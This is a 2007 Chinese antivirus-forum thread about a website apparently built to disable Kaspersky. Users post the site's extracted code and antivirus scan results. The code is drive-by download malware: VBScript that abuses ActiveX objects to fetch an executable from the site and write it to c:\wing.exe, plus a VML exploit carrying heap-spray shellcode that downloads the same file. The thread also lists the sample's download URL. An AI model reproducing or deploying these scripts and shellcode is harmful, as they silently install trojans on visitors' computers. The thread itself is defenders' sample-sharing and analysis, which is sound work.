针对卡巴漏洞的网站

显示全部楼层 · 发表于 2007-4-12 12:15:49

www.17173-map.com/hh/41/index.htm 卡巴交流区看到的

这个网站打开后就显示无法显示是正常的然后卡巴就突然失效~~

是没有修改时间的情况下不知又是什么原理~~~

大家可以去提取后分析下~~~

[ 本帖最后由 tonger2003 于 2007-4-12 12:58 编辑 ]

显示全部楼层 · 发表于 2007-4-12 12:29:13

进去之后感觉到有点卡，觉得是有问题
但仔细查找又没发现什么，咖啡也没有动静

显示全部楼层 · 发表于 2007-4-12 12:31:18

？？？？

显示全部楼层 · 发表于 2007-4-12 12:43:21

进去了,红伞报两个

显示全部楼层 · 发表于 2007-4-12 12:43:40

网页无法显示

显示全部楼层 · 发表于 2007-4-12 13:33:23

样本到～

htp://www.17173-map.com/yycx/ahd41d.exe
卡巴真的失效了？杀不出是吧？

[ 本帖最后由 zxkf 于 2007-4-12 13:37 编辑 ]

显示全部楼层 · 发表于 2007-4-12 13:38:45

on error resume next
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, "http://www.17173-map.com/yycx/ahd41d.exe", False
x.Send
fsssname1="c:\\wing.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
S.write x.responseBody
S.savetofile fsssname1,2
S.close
set Q = df.createobject("Shell.Application","")
</script>
<html>
<script language="VBScript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=704.html width=0 height=0 >")
else
S.type = 1
str6="GET"
x.Open str6, "http://www.17173-map.com/hh/41/yt.vbs", False
x.Send
fsssname1="yt.vbs"
set F = df.createobject("Scripting.FileSystemObject","")

复制代码

<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body>
<script language="javascript">
var shellcode = unescape("%u9090"+"%u9090"+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
"%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u3731%u3731" +
"%u2d33%u616d%u2e70%u6f63%u2f6d%u7979%u7863%u612f" +
"%u6468%u3134%u2e64%u7865%u0065");
bigblock = unescape("%u0505%u0505");
headersize = 20;

复制代码

尾部加的是:

Ýf‹ K‹ZÝ‹‹Å^]ÂóþÿÿURLMONttp://www.17173-map.com/yycx/ahd41d.exe

复制代码

[ 本帖最后由 icka 于 2007-4-12 13:42 编辑 ]

显示全部楼层 · 发表于 2007-4-12 14:00:36

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\ahd41d.rar'
C:\Documents and Settings\morgan\My Documents\
  ahd41d.rar
[0] Archive type: RAR
--> ahd41d.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [WARNING] Infected files in archives cannot be repaired!
      [INFO]    The file was deleted!

显示全部楼层 · 发表于 2007-4-12 14:44:30

完整的样本 3个

显示全部楼层 · 发表于 2007-4-12 14:45:49

Scan performed at: 2007-4-12 14:45:47
Scanning Log
NOD32 version 2182 (20070411) NT
Command line: C:\Documents and Settings\EQ2\桌面\ahd41d.rar
Operating memory - is OK

Date: 12.4.2007 Time: 14:45:51
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\ahd41d.rar
C:\Documents and Settings\EQ2\桌面\ahd41d.rar ?RAR ?ahd41d.exe - probably unknown NewHeur_PE virus [7]
Number of scanned files: 2
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 14:45:51 Total scanning time: 0 sec (00:00:00)

Notes:
[7] File is probably infected with an unknown virus.

[病毒样本] 针对卡巴漏洞的网站

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

nod32启发式继续报

[病毒样本] 针对卡巴 漏洞的网站

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

nod32启发式继续报

[病毒样本] 针对卡巴漏洞的网站